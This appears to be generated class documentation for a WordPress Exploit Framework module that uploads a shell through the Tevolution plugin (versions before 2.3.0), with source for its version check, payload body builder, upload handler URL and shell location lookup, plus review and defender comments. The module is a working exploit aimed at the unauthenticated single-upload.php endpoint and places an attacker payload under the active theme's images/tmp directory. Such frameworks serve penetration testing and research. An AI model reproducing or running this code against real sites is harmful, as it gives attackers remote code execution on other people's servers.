class Wpxf::Exploit::TevolutionShellUpload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 6
# Registers this module's metadata on top of the parent constructor's setup.
#
# Per the module name, the affected software is the Tevolution plugin in
# versions before 2.3.0; the references below point at the public advisory
# entries for the issue.
def initialize
  super

  # Advisory identifiers, kept as [type, value] pairs.
  advisories = [
    %w[WPVDB 8482],
    ['URL', 'https://templatic.com/news/security-vulnerability-found-themes/']
  ]

  update_info(
    name: 'Tevolution < 2.3.0 Shell Upload',
    author: ['rastating'], # WPXF module
    references: advisories,
    date: 'Apr 23 2016'
  )
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 22
# Version check driven by the plugin's change log.
#
# Builds the URL of change_log.txt under the plugin directory and hands it,
# together with a version-extracting pattern and the fixed release '2.3.0',
# to check_version_from_custom_file. The return value is whatever that
# helper returns.
#
# NOTE(review): the pattern accepts only single-digit version components, so
# a change log entry such as "(Version 2.3.10)" would not match; confirm how
# check_version_from_custom_file reports a non-match before relying on the
# result as proof that a site is patched.
def check
  version_pattern = /\(Version\s(\d\.\d\.\d)\)/
  check_version_from_custom_file(
    normalize_uri(plugin_url, 'change_log.txt'),
    version_pattern,
    '2.3.0'
  )
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 35
# Assembles the request body that carries the file part.
#
# A new Utility::BodyBuilder receives a single file entry: the field name is
# a 5-character random alphabetic string, the content is payload.encoded and
# the file name is payload_name. The populated builder is returned.
def payload_body_builder
  Utility::BodyBuilder.new.tap do |body|
    field_name = Utility::Text.rand_alpha(5)
    body.add_file_from_string(field_name, payload.encoded, payload_name)
  end
end
plugin_url()
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 27
# Base URL of the plugin: the 'Tevolution' directory beneath the site's
# plugins URL (wordpress_url_plugins), joined with normalize_uri.
def plugin_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'Tevolution')
end
scrape_current_theme()
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 41
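# Reads the active theme's directory name from the site's front page.
#
# Requests full_uri and returns the first path segment that follows
# "/<wp_content_dir>/themes/" in the response body.
#
# The configured content directory is escaped before it is placed in the
# pattern, so characters such as "." or "+" in the directory name are matched
# literally and cannot widen or break the match.
#
# @return [String, nil] the theme directory name, or nil when there is no
#   response, no body, or no theme path in the body
def scrape_current_theme
  res = execute_get_request(url: full_uri)
  body = res&.body
  return nil unless body

  # to_s keeps the previous interpolation behaviour for a nil setting.
  content_dir = Regexp.escape(wp_content_dir.to_s)
  body[%r{/#{content_dir}/themes/(.*?)/}, 1]
end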
uploaded_payload_location()
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 46
# URL at which the uploaded file is expected to be reachable:
# <themes URL>/<active theme>/images/tmp/<payload_name>.
#
# For defenders this identifies the directory to watch: on affected installs,
# unexpected files under the active theme's images/tmp directory are the
# artefact this module leaves behind.
#
# NOTE(review): scrape_current_theme can return nil, and that value is passed
# straight to normalize_uri; confirm how normalize_uri treats a nil segment.
def uploaded_payload_location
  active_theme = scrape_current_theme
  themes_root = wordpress_url_themes
  normalize_uri(themes_root, active_theme, 'images', 'tmp', payload_name)
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 31
# URL of the plugin's upload handler, built beneath plugin_url.
#
# The path (tmplconnector/monetize/templatic-custom_fields/single-upload.php)
# is the endpoint this module targets; on sites still running a Tevolution
# release older than 2.3.0, requests to it are worth reviewing in the web
# server logs.
def uploader_url
  handler_path = %w[tmplconnector monetize templatic-custom_fields single-upload.php]
  normalize_uri(plugin_url, *handler_path)
end